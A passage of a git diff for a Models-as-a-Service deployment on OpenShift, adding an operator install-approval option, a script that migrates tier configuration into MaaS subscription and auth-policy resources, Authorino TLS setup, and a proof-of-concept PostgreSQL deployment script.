   local source_namespace=${1:-openshift-marketplace}; shift || true
+  local install_plan_approval=${1:-}; shift || true
 
   log_info "Installing operator: $operator_name in namespace: $namespace"
 
@@ -333,7 +376,11 @@ EOF
   fi
 
   # Create Subscription
-  log_info "Creating Subscription for $operator_name from $catalog_source (channel: $channel)"
+  local sub_log="Creating Subscription for $operator_name from $catalog_source (channel: $channel"
+  [[ -n "$install_plan_approval" ]] && sub_log+=", installPlanApproval: $install_plan_approval"
+  [[ -n "$starting_csv" ]] && sub_log+=", startingCSV: $starting_csv"
+  sub_log+=")"
+  log_info "$sub_log"
   local subscription_yaml="
 apiVersion: operators.coreos.com/v1alpha1
 kind: Subscription
@@ -347,6 +394,11 @@ spec:
   sourceNamespace: ${source_namespace}
 "
 
+  if [[ -n "$install_plan_approval" ]]; then
+    subscription_yaml="${subscription_yaml}  installPlanApproval: ${install_plan_approval}
+"
+  fi
+
   if [[ -n "$starting_csv" ]]; then
     subscription_yaml="${subscription_yaml}  startingCSV: ${starting_csv}
 "
@@ -354,6 +406,11 @@ spec:
 
   echo "$subscription_yaml" | kubectl apply -f -
 
+  if [[ "$install_plan_approval" == "Manual" ]]; then
+    log_info "Manual Subscription: approving initial InstallPlan so first install can proceed..."
+    approve_initial_installplan_if_manual "$namespace" "$operator_name" 180
+  fi
+
   # Wait for subscription to be installed
   log_info "Waiting for subscription to install..."
   waitsubscriptioninstalled "$namespace" "$operator_name"
diff --git a/scripts/migrate-tier-to-subscription.sh b/scripts/migrate-tier-to-subscription.sh
new file mode 100755
index 000000000..5291c00c2
--- /dev/null
+++ b/scripts/migrate-tier-to-subscription.sh
@@ -0,0 +1,616 @@
+#!/bin/bash
+
+# Migration script: Convert tier-based configuration to subscription model
+# This script generates MaaSModelRef, MaaSAuthPolicy, and MaaSSubscription CRs
+# from existing tier-to-group-mapping ConfigMap configuration.
+
+set -euo pipefail
+
+# Default values
+TIER=""
+MODELS=""
+AUTH_GROUPS=""
+RATE_LIMIT=""
+WINDOW="1m"
+OUTPUT_DIR="migration-crs"
+SUBSCRIPTION_NAMESPACE="models-as-a-service"
+MODEL_NAMESPACE="llm"
+MAAS_NAMESPACE="opendatahub"
+DRY_RUN=false
+APPLY=false
+VERBOSE=false
+
+# Colors
+RED='\033[0;31m'
+GREEN='\033[0;32m'
+YELLOW='\033[1;33m'
+BLUE='\033[0;34m'
+NC='\033[0m' # No Color
+
+# Helper functions
+log_info() {
+    echo -e "${BLUE}ℹ️  ${NC}$1"
+}
+
+log_success() {
+    echo -e "${GREEN}✅ ${NC}$1"
+}
+
+log_warn() {
+    echo -e "${YELLOW}⚠️  ${NC}$1"
+}
+
+log_error() {
+    echo -e "${RED}❌ ${NC}$1"
+}
+
+log_verbose() {
+    if [[ "$VERBOSE" == "true" ]]; then
+        echo -e "${BLUE}   ${NC}$1"
+    fi
+}
+
+# Validate Kubernetes resource name (DNS subdomain format)
+# Usage: validate_resource_name <name> <field> [max_length]
+validate_resource_name() {
+    local name="$1"
+    local field="$2"
+    local max_length="${3:-253}"  # Default to 253 (DNS subdomain), override for stricter limits
+
+    if [[ -z "$name" ]]; then
+        log_error "$field cannot be empty"
+        return 1
+    fi
+
+    if [[ ${#name} -gt $max_length ]]; then
+        log_error "$field '$name' exceeds maximum length of $max_length characters (actual: ${#name})"
+        return 1
+    fi
+
+    if [[ ! "$name" =~ ^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$ ]]; then
+        log_error "$field '$name' contains invalid characters"
+        log_info "Valid format: lowercase alphanumeric, '-', '.'; must start/end with alphanumeric"
+        return 1
+    fi
+
+    return 0
+}
+
+# Quote string for YAML output (escapes quotes and special chars)
+yaml_quote() {
+    local value="$1"
+    # Escape backslashes and double quotes
+    value="${value//\\/\\\\}"
+    value="${value//\"/\\\"}"
+    echo "\"$value\""
+}
+
+# Validate that an option has a value
+validate_option_value() {
+    local option="$1"
+    local value="${2:-}"
+
+    if [[ -z "$value" ]] || [[ "$value" == --* ]]; then
+        log_error "Option $option requires a value"
+        usage
+        exit 1
+    fi
+}
+
+usage() {
+    cat <<EOF
+Usage: $0 [OPTIONS]
+
+Migrate tier-based configuration to subscription model by generating MaaS CRs.
+
+OPTIONS:
+    --tier <name>               Tier name from ConfigMap (required)
+    --models <list>             Comma-separated model names (required)
+    --groups <list>             Comma-separated group names (optional, auto-detected from ConfigMap)
+    --rate-limit <limit>        Token rate limit (required)
+    --window <duration>         Rate limit window (default: 1m)
+    --output <dir>              Output directory for generated CRs (default: migration-crs)
+    --subscription-ns <ns>      Subscription namespace (default: models-as-a-service)
+    --model-ns <ns>             Model namespace (default: llm)
+    --maas-ns <ns>              MaaS namespace (default: opendatahub)
+    --dry-run                   Generate files without applying
+    --apply                     Apply generated CRs to cluster
+    --verbose                   Enable verbose logging
+    --help                      Show this help message
+
+EXAMPLES:
+    # Generate CRs for premium tier
+    $0 --tier premium \\
+       --models model-a,model-b,model-c \\
+       --groups premium-users \\
+       --rate-limit 50000 \\
+       --output migration-crs/premium/
+
+    # Generate and apply for free tier
+    $0 --tier free \\
+       --models simulator,qwen3 \\
+       --groups system:authenticated \\
+       --rate-limit 100 \\
+       --apply
+
+    # Extract tier config from ConfigMap and generate CRs
+    $0 --tier enterprise \\
+       --models \$(kubectl get llminferenceservice -n llm -o name | cut -d/ -f2 | tr '\\n' ',') \\
+       --groups enterprise-users \\
+       --rate-limit 100000 \\
+       --dry-run \\
+       --verbose
+
+EOF
+}
+
+# Parse command line arguments
+while [[ $# -gt 0 ]]; do
+    case $1 in
+        --tier)
+            validate_option_value "$1" "${2:-}"
+            TIER="$2"
+            shift 2
+            ;;
+        --models)
+            validate_option_value "$1" "${2:-}"
+            MODELS="$2"
+            shift 2
+            ;;
+        --groups)
+            validate_option_value "$1" "${2:-}"
+            AUTH_GROUPS="$2"
+            shift 2
+            ;;
+        --rate-limit)
+            validate_option_value "$1" "${2:-}"
+            RATE_LIMIT="$2"
+            shift 2
+            ;;
+        --window)
+            validate_option_value "$1" "${2:-}"
+            WINDOW="$2"
+            shift 2
+            ;;
+        --output)
+            validate_option_value "$1" "${2:-}"
+            OUTPUT_DIR="$2"
+            shift 2
+            ;;
+        --subscription-ns)
+            validate_option_value "$1" "${2:-}"
+            SUBSCRIPTION_NAMESPACE="$2"
+            shift 2
+            ;;
+        --model-ns)
+            validate_option_value "$1" "${2:-}"
+            MODEL_NAMESPACE="$2"
+            shift 2
+            ;;
+        --maas-ns)
+            validate_option_value "$1" "${2:-}"
+            MAAS_NAMESPACE="$2"
+            shift 2
+            ;;
+        --dry-run)
+            DRY_RUN=true
+            shift
+            ;;
+        --apply)
+            APPLY=true
+            shift
+            ;;
+        --verbose)
+            VERBOSE=true
+            shift
+            ;;
+        --help)
+            usage
+            exit 0
+            ;;
+        *)
+            log_error "Unknown option: $1"
+            usage
+            exit 1
+            ;;
+    esac
+done
+
+# Validate required parameters
+if [[ -z "$TIER" ]]; then
+    log_error "Missing required parameter: --tier"
+    usage
+    exit 1
+fi
+
+if [[ -z "$MODELS" ]]; then
+    log_error "Missing required parameter: --models"
+    usage
+    exit 1
+fi
+
+if [[ -z "$RATE_LIMIT" ]]; then
+    log_error "Missing required parameter: --rate-limit"
+    usage
+    exit 1
+fi
+
+# Validate rate limit is a positive integer
+if ! [[ "$RATE_LIMIT" =~ ^[0-9]+$ ]] || [[ "$RATE_LIMIT" -eq 0 ]]; then
+    log_error "Rate limit must be a positive integer, got: '$RATE_LIMIT'"
+    exit 1
+fi
+
+# Validate window format (e.g., 1m, 60s, 1h)
+if ! [[ "$WINDOW" =~ ^[0-9]+(s|m|h|d)$ ]]; then
+    log_error "Window must be a valid duration (e.g., 1m, 60s, 1h), got: '$WINDOW'"
+    exit 1
+fi
+
+# Validate tier name (used in resource names like ${TIER}-models-access, max 63 chars)
+if ! validate_resource_name "$TIER" "Tier name" 63; then
+    log_info "Tier name is used in generated CR names and must not exceed 63 characters"
+    exit 1
+fi
+
+# Extract groups from ConfigMap if not provided
+if [[ -z "$AUTH_GROUPS" ]]; then
+    log_info "Attempting to extract groups for tier '$TIER' from ConfigMap..."
+
+    if ! command -v yq &> /dev/null; then
+        log_error "yq is required for ConfigMap extraction but not found"
+        log_info "Install yq (https://github.com/mikefarah/yq) or specify groups manually with --groups"
+        exit 1
+    fi
+
+    if kubectl get configmap tier-to-group-mapping -n maas-api >/dev/null 2>&1; then
+        AUTH_GROUPS=$(kubectl get configmap tier-to-group-mapping -n maas-api -o yaml | \
+            yq eval '.data[]' - | \
+            TIER="$TIER" yq eval '[.[] | select(.name == env(TIER)) | .groups[]] | join(",")' -)
+
+        if [[ -n "$AUTH_GROUPS" ]]; then
+            log_success "Extracted groups: $AUTH_GROUPS"
+        else
+            log_error "Could not extract groups for tier '$TIER' from ConfigMap"
+            log_info "Please specify groups manually with --groups"
+            exit 1
+        fi
+    else
+        log_error "ConfigMap tier-to-group-mapping not found in maas-api namespace"
+        log_info "Please specify groups manually with --groups"
+        exit 1
+    fi
+fi
+
+# Create output directory and clean any existing files to prevent stale YAML
+if [[ "$DRY_RUN" == "false" ]]; then
+    if [[ -d "$OUTPUT_DIR" ]]; then
+        # Directory exists - check if it has files
+        if [[ -n "$(find "$OUTPUT_DIR" -maxdepth 1 -name '*.yaml' -print -quit)" ]]; then
+            log_warn "Output directory '$OUTPUT_DIR' contains existing YAML files"
+            log_info "Cleaning directory to prevent applying stale manifests..."
+            rm -f "$OUTPUT_DIR"/*.yaml
+            log_success "Cleaned existing YAML files from: $OUTPUT_DIR"
+        fi
+    else
+        # Directory doesn't exist - create it
+        mkdir -p "$OUTPUT_DIR"
+        log_success "Created output directory: $OUTPUT_DIR"
+    fi
+fi
+
+# Convert comma-separated lists to arrays
+IFS=',' read -ra MODEL_ARRAY <<< "$MODELS"
+IFS=',' read -ra GROUP_ARRAY <<< "$AUTH_GROUPS"
+
+# Validate model names (must be valid MaaSModelRef names, max 63 chars)
+for model in "${MODEL_ARRAY[@]}"; do
+    model=$(echo "$model" | xargs) # trim whitespace
+    if ! validate_resource_name "$model" "Model name" 63; then
+        log_error "Invalid model name in list: '$model'"
+        log_info "Model names are used as MaaSModelRef names and must not exceed 63 characters"
+        exit 1
+    fi
+done
+
+# Validate group names (groups can contain ':' for system groups like 'system:authenticated')
+for group in "${GROUP_ARRAY[@]}"; do
+    group=$(echo "$group" | xargs) # trim whitespace
+    if [[ -z "$group" ]]; then
+        log_error "Group name cannot be empty"
+        exit 1
+    fi
+    # Groups have more permissive naming (allow colons for system:* groups)
+    if [[ ${#group} -gt 253 ]]; then
+        log_error "Group name '$group' exceeds maximum length of 253 characters"
+        exit 1
+    fi
+done
+
+# Validate namespace names used in modelRefs (CRD limit: 63 characters)
+if ! validate_resource_name "$MODEL_NAMESPACE" "Model namespace" 63; then
+    log_error "Model namespace is used in modelRefs[].namespace and must not exceed 63 characters"
+    exit 1
+fi
+
+# Validate subscription namespace (used as metadata.namespace for MaaSAuthPolicy/MaaSSubscription)
+if ! validate_resource_name "$SUBSCRIPTION_NAMESPACE" "Subscription namespace" 63; then
+    log_error "Subscription namespace is used as metadata.namespace for generated CRs and must not exceed 63 characters"
+    exit 1
+fi
+
+log_info "Migration Configuration:"
+log_verbose "  Tier: $TIER"
+log_verbose "  Models: ${#MODEL_ARRAY[@]} (${MODELS})"
+log_verbose "  Groups: ${#GROUP_ARRAY[@]} (${AUTH_GROUPS})"
+log_verbose "  Rate Limit: $RATE_LIMIT tokens per $WINDOW"
+log_verbose "  Output: $OUTPUT_DIR"
+log_verbose "  Namespaces: MaaS=$MAAS_NAMESPACE, Subscription=$SUBSCRIPTION_NAMESPACE, Model=$MODEL_NAMESPACE"
+log_verbose "  Mode: $([ "$DRY_RUN" == "true" ] && echo "DRY-RUN" || echo "GENERATE")$([ "$APPLY" == "true" ] && echo " + APPLY" || echo "")"
+
+# Generate MaaSModelRef for each model
+log_info "Generating MaaSModelRef CRs..."
+for model in "${MODEL_ARRAY[@]}"; do
+    model=$(echo "$model" | xargs) # trim whitespace
+
+    MAASMODELREF_FILE="$OUTPUT_DIR/maasmodelref-${model}.yaml"
+
+    if [[ "$DRY_RUN" == "false" ]]; then
+        cat > "$MAASMODELREF_FILE" <<EOF
+# MaaSModelRef: Register model '$model' with MaaS
+# Generated by migrate-tier-to-subscription.sh for tier '$TIER'
+---
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSModelRef
+metadata:
+  name: $(yaml_quote "$model")
+  namespace: $(yaml_quote "$MODEL_NAMESPACE")
+  labels:
+    migration.maas.opendatahub.io/from-tier: $(yaml_quote "$TIER")
+    migration.maas.opendatahub.io/generated: "true"
+  annotations:
+    migration.maas.opendatahub.io/timestamp: $(yaml_quote "$(date -u +%Y-%m-%dT%H:%M:%SZ)")
+    migration.maas.opendatahub.io/original-tier: $(yaml_quote "$TIER")
+spec:
+  modelRef:
+    kind: LLMInferenceService
+    name: $(yaml_quote "$model")
+EOF
+        log_success "Generated: $MAASMODELREF_FILE"
+    else
+        log_verbose "Would generate: $MAASMODELREF_FILE"
+    fi
+done
+
+# Generate MaaSAuthPolicy (one for all models in this tier)
+log_info "Generating MaaSAuthPolicy CR..."
+AUTHPOLICY_FILE="$OUTPUT_DIR/maasauthpolicy-${TIER}.yaml"
+
+if [[ "$DRY_RUN" == "false" ]]; then
+    cat > "$AUTHPOLICY_FILE" <<EOF
+# MaaSAuthPolicy: Grant access to tier '$TIER' models
+# Generated by migrate-tier-to-subscription.sh
+---
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSAuthPolicy
+metadata:
+  name: $(yaml_quote "${TIER}-models-access")
+  namespace: $(yaml_quote "$SUBSCRIPTION_NAMESPACE")
+  labels:
+    migration.maas.opendatahub.io/from-tier: $(yaml_quote "$TIER")
+    migration.maas.opendatahub.io/generated: "true"
+  annotations:
+    migration.maas.opendatahub.io/timestamp: $(yaml_quote "$(date -u +%Y-%m-%dT%H:%M:%SZ)")
+    migration.maas.opendatahub.io/original-tier: $(yaml_quote "$TIER")
+    description: $(yaml_quote "Access policy for $TIER tier models (migrated from tier-based system)")
+spec:
+  modelRefs:
+EOF
+
+    for model in "${MODEL_ARRAY[@]}"; do
+        model=$(echo "$model" | xargs)
+        cat >> "$AUTHPOLICY_FILE" <<MODELREF
+    - name: $(yaml_quote "$model")
+      namespace: $(yaml_quote "$MODEL_NAMESPACE")
+MODELREF
+    done
+
+    cat >> "$AUTHPOLICY_FILE" <<EOF
+  subjects:
+    groups:
+EOF
+
+    for group in "${GROUP_ARRAY[@]}"; do
+        group=$(echo "$group" | xargs)
+        echo "      - name: $(yaml_quote "$group")" >> "$AUTHPOLICY_FILE"
+    done
+
+    cat >> "$AUTHPOLICY_FILE" <<EOF
+    users: []
+EOF
+    log_success "Generated: $AUTHPOLICY_FILE"
+else
+    log_verbose "Would generate: $AUTHPOLICY_FILE"
+fi
+
+# Generate MaaSSubscription (one for all models in this tier)
+log_info "Generating MaaSSubscription CR..."
+SUBSCRIPTION_FILE="$OUTPUT_DIR/maassubscription-${TIER}.yaml"
+
+if [[ "$DRY_RUN" == "false" ]]; then
+    cat > "$SUBSCRIPTION_FILE" <<EOF
+# MaaSSubscription: Rate limits for tier '$TIER' models
+# Generated by migrate-tier-to-subscription.sh
+---
+apiVersion: maas.opendatahub.io/v1alpha1
+kind: MaaSSubscription
+metadata:
+  name: $(yaml_quote "${TIER}-models-subscription")
+  namespace: $(yaml_quote "$SUBSCRIPTION_NAMESPACE")
+  labels:
+    migration.maas.opendatahub.io/from-tier: $(yaml_quote "$TIER")
+    migration.maas.opendatahub.io/generated: "true"
+  annotations:
+    migration.maas.opendatahub.io/timestamp: $(yaml_quote "$(date -u +%Y-%m-%dT%H:%M:%SZ)")
+    migration.maas.opendatahub.io/original-tier: $(yaml_quote "$TIER")
+    description: $(yaml_quote "Subscription for $TIER tier models with $RATE_LIMIT tokens/$WINDOW (migrated from tier-based system)")
+spec:
+  owner:
+    groups:
+EOF
+
+    for group in "${GROUP_ARRAY[@]}"; do
+        group=$(echo "$group" | xargs)
+        echo "      - name: $(yaml_quote "$group")" >> "$SUBSCRIPTION_FILE"
+    done
+
+    cat >> "$SUBSCRIPTION_FILE" <<EOF
+    users: []
+  modelRefs:
+EOF
+
+    for model in "${MODEL_ARRAY[@]}"; do
+        model=$(echo "$model" | xargs)
+        cat >> "$SUBSCRIPTION_FILE" <<EOF
+    - name: $(yaml_quote "$model")
+      namespace: $(yaml_quote "$MODEL_NAMESPACE")
+      tokenRateLimits:
+        - limit: $RATE_LIMIT
+          window: $(yaml_quote "$WINDOW")
+EOF
+    done
+
+    log_success "Generated: $SUBSCRIPTION_FILE"
+else
+    log_verbose "Would generate: $SUBSCRIPTION_FILE"
+fi
+
+# Summary
+echo ""
+log_success "Migration CRs generated successfully!"
+echo ""
+log_info "Summary:"
+log_verbose "  Tier: $TIER"
+log_verbose "  Models: ${#MODEL_ARRAY[@]}"
+log_verbose "  Groups: ${#GROUP_ARRAY[@]}"
+log_verbose "  Files generated:"
+log_verbose "    - ${#MODEL_ARRAY[@]} MaaSModelRef CRs"
+log_verbose "    - 1 MaaSAuthPolicy CR"
+log_verbose "    - 1 MaaSSubscription CR"
+echo ""
+
+if [[ "$DRY_RUN" == "true" ]]; then
+    log_warn "DRY-RUN mode: Files were NOT created"
+    log_info "Run without --dry-run to generate files"
+    exit 0
+fi
+
+log_info "Output directory: $OUTPUT_DIR"
+log_verbose "Files:"
+ls -1 "$OUTPUT_DIR"
+echo ""
+
+# Apply to cluster if requested
+if [[ "$APPLY" == "true" ]]; then
+    log_info "Applying CRs to cluster..."
+
+    # Check if kubectl is available
+    if ! command -v kubectl &> /dev/null; then
+        log_error "kubectl not found. Cannot apply CRs."
+        exit 1
+    fi
+
+    # Check if subscription namespace exists
+    if ! kubectl get namespace "$SUBSCRIPTION_NAMESPACE" >/dev/null 2>&1; then
+        log_warn "Subscription namespace '$SUBSCRIPTION_NAMESPACE' does not exist"
+
+        # Auto-create in non-interactive mode (CI or non-TTY)
+        if [[ -n "${CI:-}" ]] || [[ ! -t 0 ]]; then
+            log_info "Non-interactive mode detected, automatically creating namespace"
+            kubectl create namespace "$SUBSCRIPTION_NAMESPACE"
+            log_success "Created namespace: $SUBSCRIPTION_NAMESPACE"
+        else
+            # Interactive mode: prompt user
+            read -p "Create namespace? (y/N) " -n 1 -r
+            echo
+            if [[ $REPLY =~ ^[Yy]$ ]]; then
+                kubectl create namespace "$SUBSCRIPTION_NAMESPACE"
+                log_success "Created namespace: $SUBSCRIPTION_NAMESPACE"
+            else
+                log_error "Cannot proceed without subscription namespace"
+                exit 1
+            fi
+        fi
+    fi
+
+    # Apply CRs (only files generated in this run - directory was cleaned earlier)
+    log_verbose "Applying YAML files from $OUTPUT_DIR:"
+    if [[ "$VERBOSE" == "true" ]]; then
+        ls -1 "$OUTPUT_DIR"/*.yaml 2>/dev/null | sed 's/^/  /'
+    fi
+    kubectl apply -f "$OUTPUT_DIR/"
+
+    echo ""
+    log_success "CRs applied successfully!"
+    echo ""
+
+    # Validate
+    log_info "Validating deployment..."
+    sleep 2
+
+    # Check MaaSModelRef status
+    log_info "Checking MaaSModelRef status..."
+    for model in "${MODEL_ARRAY[@]}"; do
+        model=$(echo "$model" | xargs)
+        PHASE=$(kubectl get maasmodelref "$model" -n "$MODEL_NAMESPACE" -o jsonpath='{.status.phase}' 2>/dev/null || echo "NotFound")
+        if [[ "$PHASE" == "Ready" ]]; then
+            log_success "  $model: Ready"
+        elif [[ "$PHASE" == "Pending" ]]; then
+            log_warn "  $model: Pending (may need time to reconcile)"
+        elif [[ "$PHASE" == "NotFound" ]]; then
+            log_error "  $model: Not found"
+        else
+            log_warn "  $model: $PHASE"
+        fi
+    done
+
+    # Check if AuthPolicy and TokenRateLimitPolicy were created
+    echo ""
+    log_info "Checking generated Kuadrant policies..."
+    sleep 2
+
+    AUTHPOLICY_COUNT=$(kubectl get authpolicy -n "$MODEL_NAMESPACE" -l app.kubernetes.io/managed-by=maas-controller,app.kubernetes.io/part-of=maas-auth-policy 2>/dev/null | wc -l | tr -d ' ')
+    # Subtract 1 for header line
+    AUTHPOLICY_COUNT=$((AUTHPOLICY_COUNT > 0 ? AUTHPOLICY_COUNT - 1 : 0))
+
+    TRLP_COUNT=$(kubectl get tokenratelimitpolicy -n "$MODEL_NAMESPACE" -l app.kubernetes.io/managed-by=maas-controller,app.kubernetes.io/part-of=maas-subscription 2>/dev/null | wc -l | tr -d ' ')
+    # Subtract 1 for header line
+    TRLP_COUNT=$((TRLP_COUNT > 0 ? TRLP_COUNT - 1 : 0))
+
+    log_verbose "  AuthPolicies created: $AUTHPOLICY_COUNT (expected: ${#MODEL_ARRAY[@]})"
+    log_verbose "  TokenRateLimitPolicies created: $TRLP_COUNT (expected: ${#MODEL_ARRAY[@]})"
+
+    if [[ "$AUTHPOLICY_COUNT" -eq "${#MODEL_ARRAY[@]}" ]] && [[ "$TRLP_COUNT" -eq "${#MODEL_ARRAY[@]}" ]]; then
+        log_success "All policies created successfully!"
+    else
+        log_warn "Not all policies created yet. Controller may still be reconciling."
+        log_info "Check maas-controller logs: kubectl logs -n $MAAS_NAMESPACE -l app=maas-controller"
+    fi
+
+    echo ""
+    log_info "Next steps:"
+    log_verbose "  1. Test model access with users in tier '$TIER' groups"
+    log_verbose "  2. Validate rate limiting is working as expected"
+    log_verbose "  3. Once validated, remove tier annotations from models"
+    log_verbose "  4. Remove old gateway-auth-policy and tier-based TokenRateLimitPolicy"
+    echo ""
+
+else
+    log_info "Next steps:"
+    log_verbose "  1. Review generated CRs in: $OUTPUT_DIR"
+    log_verbose "  2. Apply to cluster: kubectl apply -f $OUTPUT_DIR/"
+    log_verbose "  3. Or run with --apply flag to apply automatically"
+    echo ""
+fi
+
+log_success "Migration script completed!"
diff --git a/deployment/overlays/tls-backend/configure-authorino-tls.sh b/scripts/setup-authorino-tls.sh
similarity index 51%
rename from deployment/overlays/tls-backend/configure-authorino-tls.sh
rename to scripts/setup-authorino-tls.sh
index fd1f64baa..368787785 100755
--- a/deployment/overlays/tls-backend/configure-authorino-tls.sh
+++ b/scripts/setup-authorino-tls.sh
@@ -1,9 +1,28 @@
 #!/bin/bash
-# Configure Authorino for TLS communication with maas-api
-# This script patches operator-managed Authorino resources that can't be modified via Kustomize
+#
+# Configure Authorino for TLS communication with maas-api.
+#
+# When maas-api serves HTTPS (TLS backend), Authorino must:
+# 1. Enable TLS on its listener so it accepts HTTPS auth requests
+# 2. Trust the OpenShift service CA when making outbound requests to maas-api
+#    (e.g., API key validation at https://maas-api...:8443/internal/v1/api-keys/validate)
+#
+# This script patches operator-managed Authorino resources that cannot be
+# modified via Kustomize. It is run automatically by deploy.sh when
+# --enable-tls-backend is set (default).
 #
 # Prerequisites:
-# - Authorino operator installed in kuadrant-system namespace
+# - Authorino operator installed (Kuadrant or RHCL)
+# - OpenShift cluster (uses service-ca for certificate provisioning)
+#
+# Environment variables:
+#   AUTHORINO_NAMESPACE  Authorino namespace (default: kuadrant-system)
+#                       Use rh-connectivity-link for RHCL
+#
+# Usage:
+#   ./scripts/setup-authorino-tls.sh
+#   AUTHORINO_NAMESPACE=rh-connectivity-link ./scripts/setup-authorino-tls.sh
+#
 
 set -euo pipefail
 
@@ -32,7 +51,6 @@ kubectl patch authorino authorino -n "$NAMESPACE" --type=merge --patch '
   }
 }'
 
-
 # Note: The Authorino CR doesn't support envVars, so we patch the deployment directly
 echo "🌍 Adding environment variables to Authorino deployment..."
 kubectl -n "$NAMESPACE" set env deployment/authorino \
@@ -40,3 +58,7 @@ kubectl -n "$NAMESPACE" set env deployment/authorino \
   REQUESTS_CA_BUNDLE=/etc/ssl/certs/openshift-service-ca/service-ca-bundle.crt
 
 echo "✅ Authorino TLS configuration complete"
+echo ""
+echo "  Restart maas-api and authorino deployments to pick up TLS configuration:"
+echo "    kubectl rollout restart deployment/maas-api -n <maas-namespace>"
+echo "    kubectl rollout restart deployment/authorino -n $NAMESPACE"
diff --git a/scripts/setup-database.sh b/scripts/setup-database.sh
new file mode 100755
index 000000000..88d111ed5
--- /dev/null
+++ b/scripts/setup-database.sh
@@ -0,0 +1,170 @@
+#!/bin/bash
+#
+# Deploy PostgreSQL for MaaS API key storage.
+#
+# Creates a PostgreSQL Deployment, Service, and the maas-db-config Secret
+# containing DB_CONNECTION_URL. This is a POC-grade setup with ephemeral
+# storage; for production use AWS RDS, Crunchy Operator, or Azure Database.
+#
+# Namespace selection:
+#   - Use NAMESPACE environment variable if set
+#   - Default: opendatahub (ODH) or redhat-ods-applications (RHOAI)
+#
+# Environment variables:
+#   NAMESPACE       Target namespace (default: opendatahub)
+#   POSTGRES_USER   Database user (default: maas)
+#   POSTGRES_DB     Database name (default: maas)
+#   POSTGRES_PASSWORD  Database password (default: auto-generated)
+#
+# Usage:
+#   ./scripts/setup-database.sh
+#   NAMESPACE=redhat-ods-applications ./scripts/setup-database.sh
+#
+# Docker alternative: Replace 'kubectl' with 'oc' if using OpenShift.
+#
+
+set -euo pipefail
+
+# Default namespace for ODH; use redhat-ods-applications for RHOAI
+: "${NAMESPACE:=opendatahub}"
+
+# Ensure namespace exists
+if ! kubectl get namespace "$NAMESPACE" >/dev/null 2>&1; then
+  echo "📦 Creating namespace '$NAMESPACE'..."
+  kubectl create namespace "$NAMESPACE"
+fi
+
+echo "🔧 Deploying PostgreSQL for API key storage in namespace '$NAMESPACE'..."
+
+# Check if PostgreSQL already exists
+if kubectl get deployment postgres -n "$NAMESPACE" &>/dev/null; then
+  echo "  PostgreSQL already deployed in namespace $NAMESPACE"
+  echo "  Service: postgres:5432"
+  echo "  Secret: maas-db-config (contains DB_CONNECTION_URL)"
+  exit 0
+fi
+
+# PostgreSQL configuration (POC-grade, not for production)
+POSTGRES_USER="${POSTGRES_USER:-maas}"
+POSTGRES_DB="${POSTGRES_DB:-maas}"
+
+# Generate random password if not provided
+if [[ -z "${POSTGRES_PASSWORD:-}" ]]; then
+  POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)"
+  echo "  Generated random PostgreSQL password (stored in secret postgres-creds)"
+fi
+
+echo "  Creating PostgreSQL deployment..."
+echo "  ⚠️  Using POC configuration (ephemeral storage)"
+echo ""
+
+# Deploy PostgreSQL resources
+kubectl apply -n "$NAMESPACE" -f - <<EOF
+apiVersion: v1
+kind: Secret
+metadata:
+  name: postgres-creds
+  labels:
+    app: postgres
+    purpose: poc
+stringData:
+  POSTGRES_USER: "${POSTGRES_USER}"
+  POSTGRES_PASSWORD: "${POSTGRES_PASSWORD}"
+  POSTGRES_DB: "${POSTGRES_DB}"
+---
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  name: postgres
+  labels:
+    app: postgres
+    purpose: poc
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: postgres
+  template:
+    metadata:
+      labels:
+        app: postgres
+    spec:
+      containers:
+      - name: postgres
+        image: registry.redhat.io/rhel9/postgresql-15:latest
+        env:
+        - name: POSTGRESQL_USER
+          valueFrom:
+            secretKeyRef:
+              name: postgres-creds
+              key: POSTGRES_USER
+        - name: POSTGRESQL_PASSWORD
+          valueFrom:
+            secretKeyRef:
+              name: postgres-creds
+              key: POSTGRES_PASSWORD
+        - name: POSTGRESQL_DATABASE
+          valueFrom:
+            secretKeyRef:
+              name: postgres-creds
+              key: POSTGRES_DB
+        ports:
+        - containerPort: 5432
+        volumeMounts:
+        - name: data
+          mountPath: /var/lib/pgsql/data
+        resources:
+          requests:
+            memory: "256Mi"
+            cpu: "100m"
+          limits:
+            memory: "512Mi"
+            cpu: "500m"
+        readinessProbe:
+          exec:
+            command: ["/usr/libexec/check-container"]
+          initialDelaySeconds: 5
+          periodSeconds: 5
+      volumes:
+      - name: data
+        emptyDir: {}
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: postgres
+  labels:
+    app: postgres
+    purpose: poc
+spec:
+  selector:
+    app: postgres
+  ports:
+  - port: 5432
+    targetPort: 5432
+---
+apiVersion: v1
+kind: Secret
+metadata:
+  name: maas-db-config
+  labels:
+    app: maas-api
+    purpose: poc
+stringData:
+  DB_CONNECTION_URL: "postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@postgres:5432/${POSTGRES_DB}?sslmode=disable"
+EOF
+
+echo "  Waiting for PostgreSQL to be ready..."
+if ! kubectl wait -n "$NAMESPACE" --for=condition=available deployment/postgres --timeout=120s; then
+  echo "❌ PostgreSQL deployment failed to become ready" >&2
+  exit 1
+fi
+
+echo ""
+echo "✅ PostgreSQL deployed successfully"
+echo "  Database: $POSTGRES_DB"
+echo "  User: $POSTGRES_USER"
+echo "  Secret: maas-db-config (contains DB_CONNECTION_URL)"
+echo ""
+echo "  ⚠️  For production, use AWS RDS, Crunchy Operator, or Azure Database"
+echo "  Note: Schema migrations run automatically when maas-api starts"
diff --git a/scripts/validate-deployment.sh b/scripts/validate-deployment.sh
index 781c9608a..1d5846853 100755
--- a/scripts/validate-deployment.sh
+++ b/scripts/validate-deployment.sh
@@ -414,18 +414,79 @@ else
     print_info "Using gateway endpoint: $HOST"
     
     # Get authentication token for API tests
-    # Use pre-existing token from CI/test environment, or fall back to oc whoami -t
+    # First obtain the OC identity token, then create a MaaS API key for subsequent calls
     print_check "Authentication token"
-    if command -v oc &> /dev/null; then
-        TOKEN="${TOKEN:-${ADMIN_OC_TOKEN:-$(oc whoami -t 2>/dev/null || echo "")}}"
-        if [ -n "$TOKEN" ]; then
-            print_success "Authentication token available"
+    TOKEN=""
+    API_KEY_ID=""
